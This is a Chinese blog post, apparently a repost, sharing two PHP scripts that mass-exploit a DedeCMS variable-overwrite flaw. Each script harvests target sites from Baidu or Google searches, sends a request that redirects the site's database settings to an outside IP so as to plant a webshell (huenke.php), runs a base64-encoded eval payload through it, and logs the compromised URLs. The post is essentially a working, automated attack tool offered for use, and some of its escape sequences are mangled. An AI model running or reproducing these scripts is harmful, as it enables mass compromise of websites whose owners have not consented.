好吧之前就把google发在了90sec 跟t00ls了!不过过了一会黑阔们就去扫描我shell地址了!
额滴神啊,速度太快了!!没办法马上赶写了一个批量修改文件名称的把shell全部移动了地方修改了文件名!
最后再把漏洞文件给那个啥了!不过一看黑阔们又挖出shell地址出来了!!
好吧不跟你们耗了。想想还是把代码发出来吧!!

这个是百度批量的。自己保存为xx.php

<?php
print_r('
[-]Exploit Title: DEDEcmsVariable coverage
[-]Date: 1182011
[-]Getshell Author: cfking#90sec.org
[-]Site from baidu
'
);
error_reporting(E_ERROR);
set_time_limit(0);
$keyword='inurl:/plus/flink_add.php' ; //
$timeout = 30;
$stratpage = 1;
$lastpage = 10000000; //
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file('c:/url.txt');
if (in_array("$urlrn",$url_list)){
echo "[-] Links repeatn";
}else{
$fp = @fopen('c:/url.txt', 'a');
@fwrite($fp, $url."rn");
@fclose($fp);
print_r("
[-] Geting URL: $urlrn");
$exploit=Getshell($url);
if (strpos($exploit,"OK")>2){
echo "[*] ".$url."/plus/huenke.phprn";
$name=rname($url);
if(strpos($name,"200")>5){
echo "[*] Rename Successn";
echo "[*] Record Successn";
$fp = @fopen('c:/2010.txt', 'a');
@fwrite($fp, $url."/plus/huenke.phprn");
@fclose($fp);

}
}
}
}
}

 

function Getshell($url){
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%

3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%

5D=119.98.61.174&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%

5D=root&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=huenke&_COOKIE%

5BGLOBALS%5D%5Bcfg_dbname%5D=dedecmsv56gbk&_COOKIE%5BGLOBALS%

5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%

BD%BB";
$data = "POST /plus/mytag_js.php?aid=1 HTTP/1.1rn";
$data .= "Host: ".$host."rn";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1)

Gecko/20100101 Firefox/5.0.1rn";
$data .= "Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

rn";
$data .= "Accept-Language: zh-cn,zh;q=0.5rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn";
$data .= "Connection: keep-alivern";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($content)."rnrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from ".$host;
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
function ReadBaiduList($keyword,$timeout,$nowpage)
{
$tmp = array();
//$data = '';
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage."

HTTP/1.1rnHost:www.baidu.comrnConnection: Closernrn");
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
@fclose($fp);
preg_match_all("/})" href="http://([^~]*?)"

target="_blank"/i",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}

function rname($url){
$host=$url;
$port="80";
$content ='huenke=@eval(base64_decode($_POST

[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZ

V9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%

2BfCIpOztpZiAocmVuYW1lKCdteXRhZ19qcy5waHAnLCdteXRhZ19qc19iYWsucG

hwJykpZWNobyAiWUVTIjs7ZWNobygifDwtIik7ZGllKCk7';
$data = "POST /plus/huenke.php HTTP/1.1rn";
$data .= "X-Forwarded-For: 199.1.88.29rn";
$data .= "Referer: http://$hostrn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-

US) Firefox/3.5.0rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Host: $hostrn";
$data .= "Content-Length: ".strlen($content)."rn";
$data .= "Cache-Control: no-cachernrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);

if (!$ock) {
echo "[*] No response from $hostn";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>

 

这个是谷歌批量的,用法同上

<?php
print_r('
[-]Exploit Title: DEDEcms Variable coverage
[-]Date: 1182011
[-]Getshell Author: cfking#90sec.org
[-]Site from google
'
);
error_reporting(E_ERROR);
set_time_limit(0);
$keyword='/plus/search.php' ;
$timeout = 30;
$stratpage = 5;
$lastpage = 10000000; //
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadgoogleList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file('c:/url.txt');
if (in_array("$urlrn",$url_list)){
echo "[*] Links repeatn";
}else{
$fp = @fopen('c:/url.txt', 'a');
@fwrite($fp, $url."rn");
@fclose($fp);
print_r("
[-] Geting URL: $urlrn");
$exploit=Getshell($url);
if (strpos($exploit,"OK")>2){
echo "[*] ".$url."/plus/huenke.phprn";
$name=rname($url);
if(strpos($name,"200")>5){
echo "[*] Rename Successn";
echo "[*] Record Successn";
$fp = @fopen('c:/2012.txt', 'a');
@fwrite($fp, $url."/plus/huenke.phprn");
@fclose($fp);

}
}
}
}
}

function Getshell($url){
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=119.98.61.174&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=root&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=huenke&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=dedecmsv56gbk&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";//自己抓包修改
$data = "POST /plus/mytag_js.php?aid=1 HTTP/1.1rn";
$data .= "Host: ".$host."rn";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Accept-Language: zh-cn,zh;q=0.5rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn";
$data .= "Connection: keep-alivern";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($content)."rnrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from $host n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
function ReadgoogleList($keyword,$timeout,$nowpage) //返回该页DZ网址列表Array
{
$tmp = array();
$data = '';
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen('www.google.com.hk',80,$errno,$errstr,$timeout);
@fputs($fp,"GET /search?q=".urlencode($keyword)."&start=".$nowpage." HTTP/1.1rnHost:www.google.com.hkrnConnection: Closernrn");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
preg_match_all("/<cite>(.*?)//",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
$row = explode('/',$tmp[1][$i]);
$array[] = str_replace('http://','',$row[0]);
}
return $array;
}

function rname($url){
$host=$url;
$port="80";
$content ='huenke=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztpZiAocmVuYW1lKCdteXRhZ19qcy5waHAnLCdteXRhZ19qc19iYWsucGhwJykpZWNobyAiWUVTIjs7ZWNobygifDwtIik7ZGllKCk7';
$data = "POST /plus/huenke.php HTTP/1.1rn";
$data .= "X-Forwarded-For: 199.1.88.29rn";
$data .= "Referer: http://$hostrn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Host: $hostrn";
$data .= "Content-Length: ".strlen($content)."rn";
$data .= "Cache-Control: no-cachernrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);

if (!$ock) {
echo "[*] No response from $host rn";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/895.html